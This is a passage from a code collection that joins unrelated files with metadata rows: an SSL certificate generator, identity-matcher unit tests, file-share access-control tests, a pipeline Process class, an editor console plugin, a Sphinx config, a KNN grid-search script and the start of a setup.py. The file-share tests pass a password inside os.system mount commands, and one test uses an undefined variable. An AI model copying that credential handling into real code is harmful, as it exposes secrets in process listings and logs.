digest = 'sha256' if not PY2 else b'sha256'
# Generate key pair
pkey = crypto.PKey()
pkey.generate_key(crypto.TYPE_RSA, 2048)
# Generate cert request
req = crypto.X509Req()
subj = req.get_subject()
setattr(subj, 'CN', 'Deluge Daemon')
req.set_pubkey(pkey)
req.sign(pkey, digest)
# Generate certificate
cert = crypto.X509()
cert.set_serial_number(0)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(60 * 60 * 24 * 365 * 3) # Three Years
cert.set_issuer(req.get_subject())
cert.set_subject(req.get_subject())
cert.set_pubkey(req.get_pubkey())
cert.sign(pkey, digest)
# Write out files
ssl_dir = deluge.configmanager.get_config_dir('ssl')
with open(os.path.join(ssl_dir, 'daemon.pkey'), 'wb') as _file:
_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey))
with open(os.path.join(ssl_dir, 'daemon.cert'), 'wb') as _file:
_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
# Make the files only readable by this user
for f in ('daemon.pkey', 'daemon.cert'):
os.chmod(os.path.join(ssl_dir, f), stat.S_IREAD | stat.S_IWRITE)
| gpl-3.0 | -4,821,459,966,041,163,000 | 35.180602 | 120 | 0.594888 | false |
MetricsGrimoire/sortinghat | tests/test_matcher.py | 1 | 11000 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2017 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Santiago Dueñas <[email protected]>
#
import sys
import unittest
if '..' not in sys.path:
sys.path.insert(0, '..')
from sortinghat.db.model import UniqueIdentity, Identity, MatchingBlacklist
from sortinghat.exceptions import MatcherNotSupportedError
from sortinghat.matcher import IdentityMatcher, create_identity_matcher, match
from sortinghat.matching import EmailMatcher, EmailNameMatcher
class TestCreateIdentityMatcher(unittest.TestCase):
def test_identity_matcher_instance(self):
"""Test if the factory function returns an identity matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
matcher = create_identity_matcher('email')
self.assertIsInstance(matcher, EmailMatcher)
matcher = create_identity_matcher('email-name')
self.assertIsInstance(matcher, EmailNameMatcher)
def test_identity_matcher_instance_with_blacklist(self):
"""Test if the factory function adds a blacklist to the matcher instance"""
# The blacklist is empty
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 0)
# Create a matcher with a blacklist
blacklist = [MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
matcher = create_identity_matcher('default', blacklist=blacklist)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 5)
def test_identity_matcher_instance_with_sources_list(self):
"""Test if the factory function adds a sources list to the matcher instance"""
# The sources list is None
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.sources, None)
# Create a matcher with a sources list
sources = ['git', 'jira', 'github']
matcher = create_identity_matcher('default', sources=sources)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.sources), 3)
def test_identity_matcher_instance_with_strict(self):
"""Test if the factory function adds the strict mode to the matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, True)
matcher = create_identity_matcher('default', strict=False)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, False)
def test_not_supported_matcher(self):
"""Check if an exception is raised when the given matcher type is not supported"""
self.assertRaises(MatcherNotSupportedError,
create_identity_matcher, 'custom')
class TestIdentityMatcher(unittest.TestCase):
"""Test IdentityMatcher class"""
def test_blacklist(self):
"""Test blacklist contents"""
m = IdentityMatcher()
self.assertListEqual(m.blacklist, [])
m = IdentityMatcher(blacklist=[])
self.assertListEqual(m.blacklist, [])
blacklist = [MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='[email protected]'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
m = IdentityMatcher(blacklist=blacklist)
self.assertListEqual(m.blacklist, ['john smith', '[email protected]',
'[email protected]', '[email protected]',
'root'])
def test_sources_list(self):
"""Test sources list contents"""
m = IdentityMatcher()
self.assertEqual(m.sources, None)
m = IdentityMatcher(sourecs=[])
self.assertEqual(m.sources, None)
sources = ['git', 'Jira', 'GitHub']
m = IdentityMatcher(sources=sources)
self.assertListEqual(m.sources, ['git', 'github', 'jira'])
def test_strict_mode(self):
"""Test strict mode value"""
m = IdentityMatcher()
self.assertEqual(m.strict, True)
m = IdentityMatcher(strict=False)
self.assertEqual(m.strict, False)
class TestMatch(unittest.TestCase):
"""Test match function"""
def setUp(self):
# Add some unique identities
self.john_smith = UniqueIdentity('John Smith')
self.john_smith.identities = [Identity(email='[email protected]', name='John Smith',
source='scm', uuid='John Smith'),
Identity(name='John Smith',
source='scm', uuid='John Smith'),
Identity(username='jsmith',
source='scm', uuid='John Smith')]
self.jsmith = UniqueIdentity('J. Smith')
self.jsmith.identities = [Identity(name='J. Smith', username='john_smith',
source='alt', uuid='J. Smith'),
Identity(name='John Smith', username='jsmith',
source='alt', uuid='J. Smith'),
Identity(email='jsmith',
source='alt', uuid='J. Smith')]
self.jane_rae = UniqueIdentity('Jane Rae')
self.jane_rae.identities = [Identity(name='Janer Rae',
source='mls', uuid='Jane Rae'),
Identity(email='[email protected]', name='Jane Rae Doe',
source='mls', uuid='Jane Rae')]
self.js_alt = UniqueIdentity('john_smith')
self.js_alt.identities = [Identity(name='J. Smith', username='john_smith',
source='scm', uuid='john_smith'),
Identity(username='john_smith',
source='mls', uuid='john_smith'),
Identity(username='Smith. J',
source='mls', uuid='john_smith'),
Identity(email='[email protected]', name='Smith. J',
source='mls', uuid='john_smith')]
self.jrae = UniqueIdentity('jrae')
self.jrae.identities = [Identity(email='[email protected]', name='Jane Rae Doe',
source='mls', uuid='jrae'),
Identity(name='jrae', source='mls', uuid='jrae'),
Identity(name='jrae', source='scm', uuid='jrae')]
def test_match_email(self):
"""Test whether the function finds every possible matching using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name(self):
"""Test whether the function finds every possible matching using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_match_email_fast_mode(self):
"""Test matching in fast mode using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name_fast_mode(self):
"""Test matching in fast mode using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_matcher_error(self):
"""Test if it raises an error when the matcher is not valid"""
self.assertRaises(TypeError, match, [], None)
self.assertRaises(TypeError, match, [], "")
def test_matcher_not_supported_fast_mode(self):
"""Test if it raises and error when a matcher does not supports the fast mode"""
matcher = IdentityMatcher()
self.assertRaises(MatcherNotSupportedError,
match, [], matcher, True)
if __name__ == "__main__":
unittest.main()
| gpl-3.0 | 5,165,033,627,049,388,000 | 38.282143 | 95 | 0.582508 | false |
dataflow/DataStage | test/FileShare/tests/TestFileUserAPublic.py | 1 | 11291 | # ---------------------------------------------------------------------
#
# Copyright (c) 2012 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, --INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# ---------------------------------------------------------------------
# $Id: TestFileUserAPublic.py 1047 2009-01-15 14:48:58Z graham $
#
# Unit testing for FileUserAPublic module
#
import os
import sys
import httplib
import urllib2
import unittest
import subprocess
sys.path.append("../..")
from TestConfig import TestConfig
# Initialize authenticated HTTP connection opener
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, TestConfig.webdavbaseurl, TestConfig.collabname, TestConfig.collabpass)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
class TestFileUserAPublic(unittest.TestCase):
def setUp(self):
mountcommand = ( '/sbin/mount.cifs //%(host)s/files/%(userA)s %(mountpt)s -o rw,user=%(user)s,password=%(pass)s,nounix,forcedirectio' %
{ 'host': TestConfig.hostname
, 'userA': TestConfig.userAname
, 'user': TestConfig.collabname
, 'mountpt': TestConfig.cifsmountpoint
, 'pass': TestConfig.collabpass
} )
status=os.system(mountcommand)
self.assertEqual(status, 0, 'CIFS Mount failure')
return
def tearDown(self):
os.system('/sbin/umount.cifs '+TestConfig.cifsmountpoint)
return
# Test cases
def testNull(self):
assert (True), "True expected"
return
def testReadMeSSH(self):
f=os.system(ssh_string)
print f
return
def testReadMeCIFS(self):
# Test assumes DATASTAGE shared file system is mounted at mountpoint
# Open README file
f=None
try:
f = open(TestConfig.cifsmountpoint+'/'+TestConfig.readmefile)
except:
pass
assert (f==None), "Public user can read User A's file!"
return
def testCreateFileCIFS(self):
f=None
try:
f = open(TestConfig.cifsmountpoint+'/testCreateFile.tmp','w+')
except:
pass
assert (f==None), "Public user can create files in User A's filespace!"
return
def testUpdateFileCIFS(self):
f=None
try:
f = open(TestConfig.cifsmountpoint+'/'+'TestConfig.readmefile','w+')
except:
pass
assert (f==None), "Public user can open User A's files for writing!"
return
def testDeleteFileCIFS(self):
filename1 = TestConfig.cifsmountpoint+'/testCreateFile.tmp'
filename2 = TestConfig.cifsmountpoint+'/testUpdateFile.tmp'
# Test and delete first file
try:
s = os.stat(filename1)
except:
assert (False), "File "+filename1+" not found or other stat error"
os.remove(filename1)
try:
s = os.stat(filename1)
assert (False), "File "+filename1+" not deleted"
except:
pass
# Test and delete second file
try:
s = os.stat(filename2)
except:
assert (False), "File "+filename2+" not found or other stat error"
os.remove(filename2)
try:
s = os.stat(filename2)
assert (False), "File "+filename2+" not deleted"
except:
pass
return
def testReadMeDAVfs(self):
# Test assumes DATASTAGE shared file system is mounted at mountpoint
# Open README file
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
f = open(TestConfig.webdavmountpoint+'/'+TestConfig.readmefile)
assert (f), "README file open failed (DAVfs)"
# Read first line
l = f.readline()
# Close file
f.close()
# Check first line
self.assertEqual(l, TestConfig.readmetext, 'Unexpected README content')
os.system('umount '+TestConfig.webdavmountpoint)
return
def testCreateFileDAVfs(self):
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
f = open(TestConfig.webdavmountpoint+'/testCreateWebDAVFile.tmp','w+')
assert (f), "File creation failed"
f.write('Test creation of file\n')
f.close()
f = open(TestConfig.webdavmountpoint+'/testCreateWebDAVFile.tmp','r')
l = f.readline()
f.close()
self.assertEqual(l, 'Test creation of file\n', 'Unexpected file content')
os.system('umount '+TestConfig.webdavmountpoint)
return
def testUpdateFileDAVfs(self):
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
filename = TestConfig.webdavmountpoint+'/testUpdateWebDAVFile.tmp'
f = open(filename,'w+')
assert (f), "File creation failed"
f.write('Test creation of file\n')
f.close()
f = open(filename,'a+')
f.write('Test update of file\n')
f.close()
f = open(filename,'r')
l1 = f.readline()
l2 = f.readline()
f.close()
self.assertEqual(l1, 'Test creation of file\n', 'Unexpected file content: l1')
self.assertEqual(l2, 'Test update of file\n', 'Unexpected file content: l2')
os.system('umount '+TestConfig.webdavmountpoint)
return
def testDeleteFileDAVfs(self):
status=os.system('mount '+TestConfig.webdavmountpoint)
self.assertEqual(status, 0, 'DAVfs Mount failure')
filename1 = TestConfig.webdavmountpoint+'/testCreateWebDAVFile.tmp'
filename2 = TestConfig.webdavmountpoint+'/testUpdateWebDAVFile.tmp'
# Test and delete first file
try:
s = os.stat(filename1)
except:
assert (False), "File "+filename1+" not found or other stat error"
os.remove(filename1)
try:
s = os.stat(filename1)
assert (False), "File "+filename1+" not deleted"
except:
pass
# Test and delete second file
try:
s = os.stat(filename2)
except:
assert (False), "File "+filename2+" not found or other stat error"
os.remove(filename2)
try:
s = os.stat(filename2)
assert (False), "File "+filename2+" not deleted"
except:
pass
os.system('umount '+TestConfig.webdavmountpoint)
return
def testReadMeHTTP(self):
thepage=None
try:
pagehandle = urllib2.urlopen(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/'+TestConfig.readmefile)
thepage = pagehandle.read()
except:
pass
assert (thepage==None), "Public user can read User A's file by HTTP!"
return
def testCreateFileHTTP(self):
thepage=None
createstring="Testing file creation with WebDAV"
try:
req=urllib2.Request(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp', data=createstring)
req.add_header('Content-Type', 'text/plain')
req.get_method = lambda: 'PUT'
url=opener.open(req)
phan=urllib2.urlopen(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp')
thepage=phan.read()
except:
pass
assert (thepage==None), "Public user can create a file in User A's filespace by HTTP!"
return
def testUpdateFileHTTP(self):
thepage=None
updatestring="Testing file modification with WebDAV"
try:
req=urllib2.Request(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp', data=updatestring)
req.get_method = lambda: 'PUT'
url=opener.open(req)
phan=urllib2.urlopen(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp')
thepage=phan.read()
except:
pass
assert (thepage!=updatestring), "Public user can update User A's file by HTTP!"
return
def testDeleteFileHTTP(self):
req=urllib2.Request(TestConfig.webdavbaseurl+'/'+TestConfig.userAname+'/TestWebDAVCreate.tmp')
req.get_method = lambda: 'DELETE'
url=opener.open(req)
return
# Sentinel/placeholder tests
def testUnits(self):
assert (True)
def testComponents(self):
assert (True)
def testIntegration(self):
assert (True)
def testPending(self):
assert (False), "No pending test"
# Assemble test suite
from MiscLib import TestUtils
def getTestSuite(select="unit"):
"""
Get test suite
select is one of the following:
"unit" return suite of unit tests only
"component" return suite of unit and component tests
"all" return suite of unit, component and integration tests
"pending" return suite of pending tests
name a single named test to be run
"""
testdict = {
"unit":
[ "testUnits"
, "testNull"
],
"component":
[ "testComponents"
, "testReadMeCIFS"
, "testReadMeHTTP"
, "testCreateFileCIFS"
, "testCreateFileHTTP"
, "testUpdateFileCIFS"
, "testUpdateFileHTTP"
],
"integration":
[ "testIntegration"
],
"pending":
[ "testPending"
, "testReadMeSSH"
, "testReadMeDAVfs"
, "testCreateFileDAVfs"
, "testUpdateFileDAVfs"
, "testDeleteFileDAVfs"
, "testDeleteFileCIFS"
, "testDeleteFileHTTP"
]
}
return TestUtils.getTestSuite(TestFileUserAPublic, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("TestFileUserAPublic", getTestSuite, sys.argv)
# End.
| mit | 4,551,241,056,492,288,500 | 33.741538 | 143 | 0.604818 | false |
lexman/tuttle | tuttle/process.py | 1 | 4297 | # -*- coding: utf8 -*-
from time import time
class Process:
""" Class wrapping a process. A process has some input resources, some output resources,
some code that produces outputs from inputs, a processor that handle the language specificities
"""
def __init__(self, processor, filename, line_num):
self._start = None
self._end = None
self._processor = processor
self._filename = filename
self._line_num = line_num
self._inputs = []
self._outputs = []
self._code = ""
self.log_stdout = None
self.log_stderr = None
self._reserved_path = None
self._success = None
self._error_message = None
self._id = "{}_{}".format(self._filename, self._line_num)
@property
def start(self):
return self._start
@property
def end(self):
return self._end
@property
def id(self):
return self._id
@property
def code(self):
return self._code
# TODO Use a setter ?
def set_code(self, code):
self._code = code
@property
def success(self):
return self._success
@property
def error_message(self):
return self._error_message
@property
def processor(self):
return self._processor
def add_input(self, input_res):
self._inputs.append(input_res)
def add_output(self, output):
self._outputs.append(output)
def iter_inputs(self):
for res in self._inputs:
yield res
def iter_outputs(self):
for res in self._outputs:
yield res
def has_outputs(self):
return len(self._outputs) > 0
def has_input(self, resource):
return resource in self._inputs
def input_urls(self):
return {resource.url for resource in self._inputs}
def output_urls(self):
return {resource.url for resource in self._outputs}
def sorted_inputs_string(self):
sorted_inputs_urls = sorted([resource.url for resource in self.iter_inputs()])
return ",".join(sorted_inputs_urls)
def depends_on_process(self, process):
""" Returns True if self deprends on a resource created by process"""
for output_resource in process.iter_outputs():
if self.has_input(output_resource):
return True
return False
def pick_an_output(self):
if not self.has_outputs():
return None
return self._outputs[0]
def retrieve_execution_info(self, process):
""" Copy the execution info (all the properties set by function run()) from another process
:param process:
:return:
"""
self._start = process.start
self._end = process.end
self._success = process.success
self.log_stdout = process.log_stdout
self.log_stderr = process.log_stderr
self._reserved_path = process._reserved_path
def reset_execution_info(self):
""" Reset the execution info (all the properties set by function run()) because the resources produced
by this process have been invalidated
:return:
"""
self._start = None
self._end = None
self.log_stdout = None
self.log_stderr = None
self._success = None
def static_check(self):
"""
Runs a verification that the process won't obviously fail. This is used for static analysis before any process
is run
"""
self._processor.static_check(self)
def assign_paths(self, reserved_path, log_stdout, log_stderr):
assert reserved_path is not None
self._reserved_path = reserved_path
self.log_stdout = log_stdout
self.log_stderr = log_stderr
def set_start(self):
self._start = time()
def set_end(self, success, error_msg):
self._end = time()
self._success = success
self._error_message = error_msg
def missing_outputs(self):
"""
:return: True if all input resources for this process exist, False otherwise
"""
result = []
for resource in self.iter_outputs():
if not resource.exists():
result.append(resource)
return result | mit | 1,463,314,768,997,302,000 | 27.091503 | 118 | 0.593903 | false |
mate-desktop/pluma | plugins/pythonconsole/pythonconsole/__init__.py | 1 | 2589 | # -*- coding: utf-8 -*-
# __init__.py -- plugin object
#
# Copyright (C) 2006 - Steve Frécinaux
# Copyright (C) 2012-2021 MATE Developers
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA.
# Parts from "Interactive Python-GTK Console" (stolen from epiphany's console.py)
# Copyright (C), 1998 James Henstridge <[email protected]>
# Copyright (C), 2005 Adam Hooper <[email protected]>
# Bits from pluma Python Console Plugin
# Copyrignt (C), 2005 Raphaël Slinckx
from gi.repository import GObject, Gtk, Peas, PeasGtk, Pluma
from .console import PythonConsole
from .config import PythonConsoleConfigWidget
from .config import PythonConsoleConfig
PYTHON_ICON = 'text-x-python'
class PythonConsolePlugin(GObject.Object, Pluma.WindowActivatable, PeasGtk.Configurable):
__gtype_name__ = "PythonConsolePlugin"
window = GObject.Property(type=Pluma.Window)
def __init__(self):
GObject.Object.__init__(self)
self.config_widget = None
def do_activate(self):
self._console = PythonConsole(namespace = {'__builtins__' : __builtins__,
'pluma' : Pluma,
'window' : self.window})
self._console.eval('print("You can access the main window through ' \
'\'window\' :\\n%s" % window)', False)
bottom = self.window.get_bottom_panel()
image = Gtk.Image()
image.set_from_icon_name(PYTHON_ICON, Gtk.IconSize.MENU)
bottom.add_item(self._console, _('Python Console'), image)
def do_deactivate(self):
self._console.stop()
bottom = self.window.get_bottom_panel()
bottom.remove_item(self._console)
def do_create_configure_widget(self):
if not self.config_widget:
self.config_widget = PythonConsoleConfigWidget(self.plugin_info.get_data_dir())
return self.config_widget.configure_widget()
# ex:et:ts=4:
| gpl-2.0 | 8,445,804,338,091,260,000 | 38.19697 | 91 | 0.669115 | false |
gimler/guzzle-docs | conf.py | 1 | 7580 | # -*- coding: utf-8 -*-
#
# Guzzle documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 1 22:54:52 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True, linenos=1)
lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1)
primary_domain = 'php'
# (Optional) Use a shorter name to conserve nav. bar space.
html_short_title = "Guzzle"
# (Optional) Logo. Should be exactly 32x32 px to fit the nav. bar.
# Path should be relative to the html_static_path setting (e.g.,
# "_static") in source.
# html_logo = "my_logo.png"
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['theme/_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Guzzle'
copyright = u'2012, Michael Dowling'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.6'
# The full version, including alpha/beta/rc tags.
release = '2.6.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'php'
highlight_language = 'php'
linenos = True
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'github'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
sys.path.append(os.path.abspath('theme'))
html_theme_path = ['theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['theme/_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Guzzledoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Guzzle.tex', u'Guzzle Documentation',
u'Michael Dowling', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'guzzle', u'Guzzle Documentation',
[u'Michael Dowling'], 1)
]
| mit | 6,383,357,341,490,664,000 | 31.532189 | 80 | 0.710158 | false |
dikien/Machine-Learning-Newspaper | nytimes/step4_knn.py | 1 | 1812 | # -*- coding: UTF-8 -*-
from time import time
from step3_feature_engineering import preprocess_2
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cross_validation import KFold
from sklearn import grid_search
features, labels, vectorizer, selector, le = preprocess_2("pkl/article_2_people.pkl", "pkl/lable_2_people.pkl")
# Constructing the k-fold cross validation iterator (k=5)
cv = KFold(n=features.shape[0], # total number of samples
n_folds=5, # number of folds the dataset is divided into
shuffle=True,
random_state=123)
t0 = time()
parameters = {'algorithm':('ball_tree', 'kd_tree', 'brute'), 'n_neighbors':[5, 50, 500]}
clf = grid_search.GridSearchCV(KNeighborsClassifier(), parameters)
clf.fit(features, labels)
print "escape time : ", round(time()-t0, 3), "s"
print "best score is %s" % clf.best_score_
print "best parameter is %s" % clf.best_params_
print clf.grid_scores_
'''
escape time : 121.11 s
best score is 0.587025316456
best parameter is {'n_neighbors': 50, 'algorithm': 'ball_tree'}
[mean: 0.58386, std: 0.02612, params: {'n_neighbors': 5, 'algorithm': 'ball_tree'}, mean: 0.58703, std: 0.09922, params: {'n_neighbors': 50, 'algorithm': 'ball_tree'}, mean: 0.56448, std: 0.06137, params: {'n_neighbors': 500, 'algorithm': 'ball_tree'}, mean: 0.55380, std: 0.03316, params: {'n_neighbors': 5, 'algorithm': 'kd_tree'}, mean: 0.58703, std: 0.09922, params: {'n_neighbors': 50, 'algorithm': 'kd_tree'}, mean: 0.56448, std: 0.06137, params: {'n_neighbors': 500, 'algorithm': 'kd_tree'}, mean: 0.57120, std: 0.01555, params: {'n_neighbors': 5, 'algorithm': 'brute'}, mean: 0.58703, std: 0.09922, params: {'n_neighbors': 50, 'algorithm': 'brute'}, mean: 0.56448, std: 0.06137, params: {'n_neighbors': 500, 'algorithm': 'brute'}]
''' | bsd-3-clause | 6,622,033,397,770,966,000 | 52.323529 | 738 | 0.672737 | false |
hinesmr/libvirt-python | setup.py | 1 | 10005 | #!/usr/bin/python
from distutils.core import setup, Extension, Command
from distutils.command.build import build
from distutils.command.clean import clean
from distutils.command.sdist import sdist
from distutils.dir_util import remove_tree
from distutils.util import get_platform
from distutils.spawn import spawn
